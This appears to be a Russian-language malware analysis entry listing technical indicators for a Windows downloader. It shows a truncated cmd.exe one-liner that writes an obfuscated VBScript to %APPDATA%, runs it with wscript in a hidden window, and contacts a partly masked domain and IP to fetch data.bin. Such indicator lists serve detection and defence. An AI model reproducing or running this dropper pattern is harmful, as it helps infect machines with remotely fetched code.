Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "Chi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm WWlWx" "fuNctiOn RftRFt(JzxBK)" "Lb7x=98" "diM YAwROL,C3Ju" "TeU=13" "DtAcxY="U2"" "CSt3=69" "On erROR reSUme NEXt" "P3hiP3=82" "AeIB=...
- %APPDATA%\9669.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\9669.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "Chi=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm WWlWx" "fuNctiOn RftRFt(JzxBK)" "Lb7x=98" "diM YAwROL,C3Ju" "TeU=13" "DtAcxY="U2"" "CSt3=69" "On erROR reSUme NEXt" "P3hiP3=82" "AeIB=...' (со скрытым окном)